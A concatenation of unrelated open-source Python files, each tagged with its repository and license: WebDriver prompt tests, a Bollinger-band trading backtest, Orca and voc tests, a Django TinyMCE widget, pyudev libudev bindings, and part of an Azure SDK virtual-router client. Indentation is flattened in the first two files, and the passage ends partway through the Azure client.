assert_error(response, "unexpected alert open")
assert_dialog_handled(session, expected_text=dialog_type, expected_retval=retval)
return check_user_prompt_closed_with_exception
@pytest.fixture
def check_user_prompt_not_closed_but_exception(session, create_dialog):
def check_user_prompt_not_closed_but_exception(dialog_type):
session.url = inline("<input id=foo>")
element = session.find.css("#foo", all=False)
create_dialog(dialog_type, text=dialog_type)
response = get_element_property(session, element.id, "id")
assert_error(response, "unexpected alert open")
assert session.alert.text == dialog_type
session.alert.dismiss()
return check_user_prompt_not_closed_but_exception
@pytest.mark.capabilities({"unhandledPromptBehavior": "accept"})
@pytest.mark.parametrize("dialog_type, retval", [
("alert", None),
("confirm", True),
("prompt", ""),
])
def test_accept(check_user_prompt_closed_without_exception, dialog_type, retval):
check_user_prompt_closed_without_exception(dialog_type, retval)
@pytest.mark.capabilities({"unhandledPromptBehavior": "accept and notify"})
@pytest.mark.parametrize("dialog_type, retval", [
("alert", None),
("confirm", True),
("prompt", ""),
])
def test_accept_and_notify(check_user_prompt_closed_with_exception, dialog_type, retval):
check_user_prompt_closed_with_exception(dialog_type, retval)
@pytest.mark.capabilities({"unhandledPromptBehavior": "dismiss"})
@pytest.mark.parametrize("dialog_type, retval", [
("alert", None),
("confirm", False),
("prompt", None),
])
def test_dismiss(check_user_prompt_closed_without_exception, dialog_type, retval):
check_user_prompt_closed_without_exception(dialog_type, retval)
@pytest.mark.capabilities({"unhandledPromptBehavior": "dismiss and notify"})
@pytest.mark.parametrize("dialog_type, retval", [
("alert", None),
("confirm", False),
("prompt", None),
])
def test_dismiss_and_notify(check_user_prompt_closed_with_exception, dialog_type, retval):
check_user_prompt_closed_with_exception(dialog_type, retval)
@pytest.mark.capabilities({"unhandledPromptBehavior": "ignore"})
@pytest.mark.parametrize("dialog_type", ["alert", "confirm", "prompt"])
def test_ignore(check_user_prompt_not_closed_but_exception, dialog_type):
check_user_prompt_not_closed_but_exception(dialog_type)
@pytest.mark.parametrize("dialog_type, retval", [
("alert", None),
("confirm", False),
("prompt", None),
])
def test_default(check_user_prompt_closed_with_exception, dialog_type, retval):
check_user_prompt_closed_with_exception(dialog_type, retval)
| UK992/servo | tests/wpt/web-platform-tests/webdriver/tests/get_element_property/user_prompts.py | Python | mpl-2.0 | 4,054 |
# -*- coding: utf-8 -*-
import datetime, time, csv, os
from utils.db import SqliteDB
from utils.rwlogging import log
from utils.rwlogging import strategyLogger as logs
from trader import Trader
from indicator import ma, macd, bolling, rsi, kdj
from strategy.pool import StrategyPool
highest = 0
def runStrategy(prices):
	logs.info('STRATEGY, BUY TIMES, SELL TIMES, FINAL EQUITY')
#prices = SqliteDB().getAllPrices(table)
ps = [p['close'] for p in prices]
pool = StrategyPool(100)
#doBollingTrade(pool, prices, ps, 12, 2.4)
#pool.showStrategies()
#return
for i in range(2, 40):
j = 0
log.debug(i)
while j <= 5:
doBollingTrade(pool, prices, ps, i, j)
j += 0.1
pool.showStrategies()
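# Signal summary for doBollingTrade below (descriptive only): a cross below
# the lower band triggers a buy unless already long (bsflag < 1); a cross
# above the upper band triggers a sell unless already short (bsflag > -1);
# crosses through the mean re-trigger the side recorded in bsflag. How the
# Trader class interprets repeated buy/sell calls is not shown in this file.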
def doBollingTrade(pool, prices, ps, period, deviate):
global highest
sname = 'BOLLING_' + str(period) + '_' + str(deviate)
bollings = bolling.calc_bolling(prices, period, deviate)
t = Trader(sname)
for i in range(period, len(prices)):
if ps[i-1] > bollings['lower'][i-1] and ps[i] < bollings['lower'][i] and t.bsflag < 1:
			notes = 'LAST p: ' + str(ps[i - 1]) + '; boll lower: ' + str(bollings['lower'][i-1]) + '; CURRENT p: ' + str(ps[i]) + '; boll lower: ' + str(bollings['lower'][i])
t.buy(prices[i]['date'], prices[i]['time'], prices[i]['rmb'], notes)
if ps[i-1] < bollings['mean'][i-1] and ps[i] >= bollings['mean'][i] and t.bsflag == 1:
			notes = 'LAST p: ' + str(ps[i - 1]) + '; boll mean: ' + str(bollings['mean'][i-1]) + '; CURRENT p: ' + str(ps[i]) + '; boll mean: ' + str(bollings['mean'][i])
t.buy(prices[i]['date'], prices[i]['time'], prices[i]['rmb'], notes)
if ps[i-1] < bollings['upper'][i-1] and ps[i] > bollings['upper'][i] and t.bsflag > -1:
			notes = 'LAST p: ' + str(ps[i - 1]) + '; boll upper: ' + str(bollings['upper'][i-1]) + '; CURRENT p: ' + str(ps[i]) + '; boll upper: ' + str(bollings['upper'][i])
t.sell(prices[i]['date'], prices[i]['time'], prices[i]['rmb'], notes)
if ps[i-1] > bollings['mean'][i-1] and ps[i] <= bollings['mean'][i] and t.bsflag == -1:
			notes = 'LAST p: ' + str(ps[i - 1]) + '; boll mean: ' + str(bollings['mean'][i-1]) + '; CURRENT p: ' + str(ps[i]) + '; boll mean: ' + str(bollings['mean'][i])
t.sell(prices[i]['date'], prices[i]['time'], prices[i]['rmb'], notes)
t.show(prices[i]['date'], prices[i]['time'], prices[i]['rmb'])
pool.estimate(t)
| rolandwz/pymisc | utrader/strategy/bollingTrader.py | Python | mit | 2,348 |
#!/usr/bin/python
"""Test of radio button output using Firefox."""
from macaroon.playback import *
import utils
sequence = MacroSequence()
sequence.append(KeyComboAction("<Alt>f"))
sequence.append(KeyComboAction("p"))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("<Alt>a"))
sequence.append(utils.AssertPresentationAction(
"1. Alt a to radio button group",
["BRAILLE LINE: 'Firefox application Print dialog General page tab Range Range &=y All Pages radio button'",
" VISIBLE: '&=y All Pages radio button', cursor=1",
"SPEECH OUTPUT: 'General page tab.'",
"SPEECH OUTPUT: 'Range panel'",
"SPEECH OUTPUT: 'All Pages.'",
"SPEECH OUTPUT: 'selected radio button'"]))
sequence.append(utils.StartRecordingAction())
sequence.append(KeyComboAction("KP_Enter"))
sequence.append(utils.AssertPresentationAction(
"2. Basic Where Am I",
["BRAILLE LINE: 'Firefox application Print dialog General page tab Range Range &=y All Pages radio button'",
" VISIBLE: '&=y All Pages radio button', cursor=1",
"SPEECH OUTPUT: 'Range.'",
"SPEECH OUTPUT: 'All Pages radio button.'",
"SPEECH OUTPUT: 'selected.'",
"SPEECH OUTPUT: '1 of 4.'",
"SPEECH OUTPUT: 'Alt+A'"]))
sequence.append(KeyComboAction("Escape"))
sequence.append(utils.AssertionSummaryAction())
sequence.start()
| pvagner/orca | test/keystrokes/firefox/ui_role_radio_button.py | Python | lgpl-2.1 | 1,371 |
from django.conf.urls import url
from literature import views
pgsql_qualifier = r"[\w\d_]+"
urlpatterns = [
url(r'^$', views.list_references,),
url(r'^entry/upload/$', views.upload,),
url(r'^entry/(?P<entries_id>\d+)/$', views.show_entry,),
url(r'^entry/add$', views.LiteratureView.as_view(),),
url(r'^entry/(?P<entries_id>\d+)/edit/$', views.LiteratureView.as_view(),),
]
| tom-heimbrodt/oeplatform | literature/urls.py | Python | agpl-3.0 | 396 |
"""
TinyMCE 4 forms widget
This TinyMCE widget was copied and extended from this code by John D'Agostino:
http://code.djangoproject.com/wiki/CustomWidgetsTinyMCE
"""
import json
import logging
from django.conf import settings
from django.contrib.admin import widgets as admin_widgets
from django.forms import Media, Textarea
from django.forms.utils import flatatt
from django.template.loader import render_to_string
from django.urls import reverse
from django.utils.encoding import smart_str
from django.utils.html import escape
from django.utils.safestring import mark_safe
from django.utils.translation import get_language, get_language_bidi
from . import settings as mce_settings
logger = logging.getLogger(__name__)
def get_language_config():
"""
Creates a language configuration for TinyMCE4 based on Django project settings
:return: language- and locale-related parameters for TinyMCE 4
:rtype: dict
"""
config = {"language": get_language()[:2]}
if get_language_bidi():
config["directionality"] = "rtl"
else:
config["directionality"] = "ltr"
if mce_settings.USE_SPELLCHECKER:
from enchant import list_languages
enchant_languages = list_languages()
logger.debug(f"Enchant languages: {enchant_languages}")
lang_names = []
for lang, name in settings.LANGUAGES:
lang = convert_language_code(lang)
if lang not in enchant_languages:
lang = lang[:2]
if lang not in enchant_languages:
logger.error(f"Missing {lang} spellchecker dictionary!")
continue
if config.get("spellchecker_language") is None:
config["spellchecker_language"] = lang
lang_names.append(f"{name}={lang}")
config["spellchecker_languages"] = ",".join(lang_names)
return config
def convert_language_code(django_lang):
"""
Converts Django language codes "ll-cc" into ISO codes "ll_CC" or "ll"
:param django_lang: Django language code as ll-cc
:type django_lang: str
:return: ISO language code as ll_CC
:rtype: str
"""
lang_and_country = django_lang.split("-")
try:
return "_".join((lang_and_country[0], lang_and_country[1].upper()))
except IndexError:
return lang_and_country[0]
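# Examples (illustrative):
#
#   convert_language_code('en-us')  ->  'en_US'
#   convert_language_code('en')     ->  'en'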
def render_tinymce_init_js(mce_config, callbacks, id_=""):
"""
Renders TinyMCE.init() JavaScript code
:param mce_config: TinyMCE 4 configuration
:type mce_config: dict
:param callbacks: TinyMCE callbacks
:type callbacks: dict
:param id_: HTML element's ID to which TinyMCE is attached.
:type id_: str
:return: TinyMCE.init() code
:rtype: str
"""
if mce_settings.USE_SPELLCHECKER and "spellchecker_callback" not in callbacks:
callbacks["spellchecker_callback"] = render_to_string("tinymce/spellchecker.js")
if id_:
mce_config["selector"] = mce_config.get("selector", "textarea") + "#{}".format(
id_
)
mce_json = json.dumps(mce_config, indent=2)
return render_to_string(
"tinymce/tinymce_init.js",
{"callbacks": callbacks, "tinymce_config": mce_json[1:-1]},
)
class TinyMCE(Textarea):
"""
TinyMCE 4 widget
It replaces a textarea form widget with a rich-text WYSIWYG
`TinyMCE 4`_ editor widget.
:param attrs: General Django widget attributes.
:type attrs: dict
:param mce_attrs: Additional configuration parameters for TinyMCE 4.
They *amend* the existing configuration.
:type mce_attrs: dict
:param profile: TinyMCE 4 configuration parameters.
They *replace* the existing configuration.
:type profile: dict
.. _TinyMCE 4: https://www.tinymce.com/
"""
def __init__(self, attrs=None, mce_attrs=None, profile=None):
super().__init__(attrs)
self.mce_attrs = mce_attrs or {}
self.profile = get_language_config()
default_profile = profile or mce_settings.CONFIG.copy()
self.profile.update(default_profile)
def render(self, name, value, attrs=None, renderer=None):
if value is None:
value = ""
value = smart_str(value)
final_attrs = self.build_attrs(attrs)
final_attrs["name"] = name
mce_config = self.profile.copy()
mce_config.update(self.mce_attrs)
if mce_config.get("inline", False):
html = f"<div{flatatt(final_attrs)}>{escape(value)}</div>\n"
else:
html = "<textarea{}>{}</textarea>\n".format(
flatatt(final_attrs), escape(value)
)
html += '<script type="text/javascript">{}</script>'.format(
render_tinymce_init_js(
mce_config, mce_settings.CALLBACKS.copy(), final_attrs["id"]
)
)
return mark_safe(html) # nosec
@property
def media(self):
js = [mce_settings.JS_URL]
if mce_settings.ADDITIONAL_JS_URLS:
js += mce_settings.ADDITIONAL_JS_URLS
css = {"all": [reverse("tinymce-css")]}
if mce_settings.CSS_URL:
css["all"].append(mce_settings.CSS_URL)
return Media(js=js, css=css)
class AdminTinyMCE(TinyMCE, admin_widgets.AdminTextareaWidget):
"""TinyMCE 4 widget for Django Admin interface"""
pass
__all__ = ["TinyMCE", "render_tinymce_init_js"]
| browniebroke/django-tinymce4-widget | src/tinymce/widgets.py | Python | mit | 5,392 |
from .. utils import TranspileTestCase, BuiltinFunctionTestCase
class AnyTests(TranspileTestCase):
pass
class BuiltinAnyFunctionTests(BuiltinFunctionTestCase, TranspileTestCase):
functions = ["any"]
| cflee/voc | tests/builtins/test_any.py | Python | bsd-3-clause | 211 |
# -*- coding: utf-8 -*-
# Copyright (C) 2010, 2011, 2012 Sebastian Wiesner <[email protected]>
# This library is free software; you can redistribute it and/or modify it
# under the terms of the GNU Lesser General Public License as published by the
# Free Software Foundation; either version 2.1 of the License, or (at your
# option) any later version.
# This library is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License
# for more details.
# You should have received a copy of the GNU Lesser General Public License
# along with this library; if not, write to the Free Software Foundation,
# Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
"""
_libudev
========
Wrapper types for libudev. Use ``libudev`` attribute to access libudev
functions.
.. moduleauthor:: Sebastian Wiesner <[email protected]>
"""
from __future__ import (print_function, division, unicode_literals,
absolute_import)
import os
import errno
from ctypes import (CDLL, Structure, POINTER, get_errno,
c_char, c_char_p, c_int, c_ulonglong)
from ctypes.util import find_library
class udev(Structure):
"""
Dummy for ``udev`` structure.
"""
pass
udev_p = POINTER(udev)
class udev_enumerate(Structure):
"""
Dummy for ``udev_enumerate`` structure.
"""
udev_enumerate_p = POINTER(udev_enumerate)
class udev_list_entry(Structure):
"""
Dummy for ``udev_list_entry`` structure.
"""
udev_list_entry_p = POINTER(udev_list_entry)
class udev_device(Structure):
"""
Dummy for ``udev_device`` structure.
"""
udev_device_p = POINTER(udev_device)
class udev_monitor(Structure):
"""
Dummy for ``udev_device`` structure.
"""
udev_monitor_p = POINTER(udev_monitor)
dev_t = c_ulonglong
SIGNATURES = {
# context
'udev': dict(
new=([], udev_p),
unref=([udev_p], None),
ref=([udev_p], udev_p),
get_sys_path=([udev_p], c_char_p),
get_dev_path=([udev_p], c_char_p),
get_run_path=([udev_p], c_char_p),
get_log_priority=([udev_p], c_int),
set_log_priority=([udev_p, c_int], None)),
# enumeration
'udev_enumerate': dict(
new=([udev_p], udev_enumerate_p),
ref=([udev_enumerate_p], udev_enumerate_p),
unref=([udev_enumerate_p], None),
add_match_subsystem=([udev_enumerate_p, c_char_p], c_int),
add_nomatch_subsystem=([udev_enumerate_p, c_char_p], c_int),
add_match_property=([udev_enumerate_p, c_char_p, c_char_p], c_int),
add_match_sysattr=([udev_enumerate_p, c_char_p, c_char_p], c_int),
add_nomatch_sysattr=([udev_enumerate_p, c_char_p, c_char_p], c_int),
add_match_tag=([udev_enumerate_p, c_char_p], c_int),
add_match_sysname=([udev_enumerate_p, c_char_p], c_int),
add_match_parent=([udev_enumerate_p, udev_device_p], c_int),
add_match_is_initialized=([udev_enumerate_p], c_int),
scan_devices=([udev_enumerate_p], c_int),
get_list_entry=([udev_enumerate_p], udev_list_entry_p)),
# list entries
'udev_list_entry': dict(
get_next=([udev_list_entry_p], udev_list_entry_p),
get_name=([udev_list_entry_p], c_char_p),
get_value=([udev_list_entry_p], c_char_p)),
# devices
'udev_device': dict(
ref=([udev_device_p], udev_device_p),
unref=([udev_device_p], None),
new_from_syspath=([udev_p, c_char_p], udev_device_p),
new_from_subsystem_sysname=([udev_p, c_char_p, c_char_p],
udev_device_p),
new_from_devnum=([udev_p, c_char, dev_t], udev_device_p),
new_from_environment=([udev_p], udev_device_p),
get_parent=([udev_device_p], udev_device_p),
get_parent_with_subsystem_devtype=([udev_device_p, c_char_p, c_char_p],
udev_device_p),
get_devpath=([udev_device_p], c_char_p),
get_subsystem=([udev_device_p], c_char_p),
get_syspath=([udev_device_p], c_char_p),
get_sysnum=([udev_device_p], c_char_p),
get_sysname=([udev_device_p], c_char_p),
get_driver=([udev_device_p], c_char_p),
get_devtype=([udev_device_p], c_char_p),
get_devnode=([udev_device_p], c_char_p),
get_property_value=([udev_device_p, c_char_p], c_char_p),
get_sysattr_value=([udev_device_p, c_char_p], c_char_p),
get_devnum=([udev_device_p], dev_t),
get_action=([udev_device_p], c_char_p),
get_seqnum=([udev_device_p], c_ulonglong),
get_is_initialized=([udev_device_p], c_int),
get_usec_since_initialized=([udev_device_p], c_ulonglong),
get_devlinks_list_entry=([udev_device_p], udev_list_entry_p),
get_tags_list_entry=([udev_device_p], udev_list_entry_p),
get_properties_list_entry=([udev_device_p], udev_list_entry_p),
get_sysattr_list_entry=([udev_device_p], udev_list_entry_p),
has_tag=([udev_device_p, c_char_p], c_int)),
# monitoring
'udev_monitor': dict(
ref=([udev_monitor_p], udev_monitor_p),
unref=([udev_monitor_p], None),
new_from_netlink=([udev_p, c_char_p], udev_monitor_p),
enable_receiving=([udev_monitor_p], c_int),
set_receive_buffer_size=([udev_monitor_p, c_int], c_int),
get_fd=([udev_monitor_p], c_int),
receive_device=([udev_monitor_p], udev_device_p),
filter_add_match_subsystem_devtype=(
[udev_monitor_p, c_char_p, c_char_p], c_int),
filter_add_match_tag=([udev_monitor_p, c_char_p], c_int),
filter_update=([udev_monitor_p], c_int),
filter_remove=([udev_monitor_p], c_int))
}
ERRNO_EXCEPTIONS = {
errno.ENOMEM: MemoryError,
errno.EOVERFLOW: OverflowError,
errno.EINVAL: ValueError
}
def exception_from_errno(errno):
"""
Create an exception from ``errno``.
``errno`` is an integral error number.
Return an exception object appropriate to ``errno``.
"""
exception = ERRNO_EXCEPTIONS.get(errno)
if exception is not None:
return exception()
else:
return EnvironmentError(errno, os.strerror(errno))
def check_negative_errorcode(result, func, *args):
"""
    Error checker for udev functions, which return negative error codes.
If ``result`` is smaller than ``0``, it is interpreted as negative error
code, and an appropriate exception is raised:
- ``-ENOMEM`` raises a :exc:`~exceptions.MemoryError`
- ``-EOVERFLOW`` raises a :exc:`~exceptions.OverflowError`
- all other error codes raise :exc:`~exceptions.EnvironmentError`
    If ``result`` is greater than or equal to ``0``, it is returned unchanged.
"""
if result < 0:
# udev returns the *negative* errno code at this point
errno = -result
raise exception_from_errno(errno)
else:
return result
def check_errno(result, func, *args):
"""
Error checker to check the system ``errno`` as returned by
:func:`ctypes.get_errno()`.
If ``result`` is not ``0``, an exception according to this errno is raised.
Otherwise nothing happens.
"""
if result != 0:
errno = get_errno()
if errno != 0:
raise exception_from_errno(errno)
return result
def check_errno_on_null_pointer(result, func, *args):
"""
Error checker to check the system ``errno`` as returned by
:func:`ctypes.get_errno()`.
If ``result`` is a null pointer, an exception according to this errno is
raised. Otherwise nothing happens.
"""
if not result:
errno = get_errno()
if errno != 0:
raise exception_from_errno(errno)
return result
ERROR_CHECKERS = dict(
udev_enumerate_add_match_parent=check_negative_errorcode,
udev_enumerate_add_match_subsystem=check_negative_errorcode,
udev_enumerate_add_nomatch_subsystem=check_negative_errorcode,
udev_enumerate_add_match_property=check_negative_errorcode,
udev_enumerate_add_match_sysattr=check_negative_errorcode,
udev_enumerate_add_nomatch_sysattr=check_negative_errorcode,
udev_enumerate_add_match_tag=check_negative_errorcode,
udev_enumerate_add_match_sysname=check_negative_errorcode,
udev_enumerate_add_match_is_initialized=check_negative_errorcode,
udev_monitor_set_receive_buffer_size=check_errno,
# libudev doc says, enable_receiving returns a negative errno, but tests
# show that this is not reliable, so query the real error code
udev_monitor_enable_receiving=check_errno,
udev_monitor_receive_device=check_errno_on_null_pointer,
udev_monitor_filter_add_match_subsystem_devtype=check_negative_errorcode,
udev_monitor_filter_add_match_tag=check_negative_errorcode,
udev_monitor_filter_update=check_errno,
udev_monitor_filter_remove=check_errno,
)
def load_udev_library():
"""
Load the ``udev`` library and return a :class:`ctypes.CDLL` object for
it. The library has errno handling enabled.
Important functions are given proper signatures and return types to
support type checking and argument conversion.
Raise :exc:`~exceptions.ImportError`, if the udev library was not found.
"""
if 'PYUDEV_UDEV_LIBRARY_NAME' in os.environ:
udev_library_name = os.environ['PYUDEV_UDEV_LIBRARY_NAME']
else:
udev_library_name = find_library('udev')
if not udev_library_name:
raise ImportError('No library named udev, consider setting PYUDEV_UDEV_LIBRARY_NAME')
libudev = CDLL(udev_library_name, use_errno=True)
    # attach argument/return types and error checkers to every bound function
for namespace, members in SIGNATURES.items():
for funcname in members:
fullname = '{0}_{1}'.format(namespace, funcname)
func = getattr(libudev, fullname, None)
if func:
argtypes, restype = members[funcname]
func.argtypes = argtypes
func.restype = restype
errorchecker = ERROR_CHECKERS.get(fullname)
if errorchecker:
func.errcheck = errorchecker
return libudev
libudev = load_udev_library()
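# Illustrative usage of the raw binding (added for clarity; not part of the
# original module). Assumes libudev is installed at runtime; every call below
# appears in the SIGNATURES table above, so argument and return types are
# enforced by ctypes:
#
#     context = libudev.udev_new()
#     enum = libudev.udev_enumerate_new(context)
#     libudev.udev_enumerate_add_match_subsystem(enum, b'block')
#     libudev.udev_enumerate_scan_devices(enum)
#     entry = libudev.udev_enumerate_get_list_entry(enum)
#     while entry:
#         print(libudev.udev_list_entry_get_name(entry))  # syspath as bytes
#         entry = libudev.udev_list_entry_get_next(entry)
#     libudev.udev_enumerate_unref(enum)
#     libudev.udev_unref(context)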
| Stratoscale/inaugurator | inaugurator/pyudev/_libudev.py | Python | apache-2.0 | 10,338 |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar, Union
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.core.polling import AsyncLROPoller, AsyncNoPolling, AsyncPollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.async_arm_polling import AsyncARMPolling
from ... import models as _models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class VirtualRoutersOperations:
"""VirtualRoutersOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2019_12_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
async def _delete_initial(
self,
resource_group_name: str,
virtual_router_name: str,
**kwargs: Any
) -> None:
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-12-01"
accept = "application/json"
# Construct URL
url = self._delete_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualRouterName': self._serialize.url("virtual_router_name", virtual_router_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.Error, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualRouters/{virtualRouterName}'} # type: ignore
async def begin_delete(
self,
resource_group_name: str,
virtual_router_name: str,
**kwargs: Any
) -> AsyncLROPoller[None]:
"""Deletes the specified Virtual Router.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_router_name: The name of the Virtual Router.
:type virtual_router_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling.
Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._delete_initial(
resource_group_name=resource_group_name,
virtual_router_name=virtual_router_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualRouterName': self._serialize.url("virtual_router_name", virtual_router_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualRouters/{virtualRouterName}'} # type: ignore
async def get(
self,
resource_group_name: str,
virtual_router_name: str,
expand: Optional[str] = None,
**kwargs: Any
) -> "_models.VirtualRouter":
"""Gets the specified Virtual Router.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_router_name: The name of the Virtual Router.
:type virtual_router_name: str
:param expand: Expands referenced resources.
:type expand: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: VirtualRouter, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2019_12_01.models.VirtualRouter
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.VirtualRouter"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-12-01"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualRouterName': self._serialize.url("virtual_router_name", virtual_router_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.Error, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('VirtualRouter', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualRouters/{virtualRouterName}'} # type: ignore
async def _create_or_update_initial(
self,
resource_group_name: str,
virtual_router_name: str,
parameters: "_models.VirtualRouter",
**kwargs: Any
) -> "_models.VirtualRouter":
cls = kwargs.pop('cls', None) # type: ClsType["_models.VirtualRouter"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-12-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self._create_or_update_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualRouterName': self._serialize.url("virtual_router_name", virtual_router_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'VirtualRouter')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.Error, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('VirtualRouter', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('VirtualRouter', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualRouters/{virtualRouterName}'} # type: ignore
async def begin_create_or_update(
self,
resource_group_name: str,
virtual_router_name: str,
parameters: "_models.VirtualRouter",
**kwargs: Any
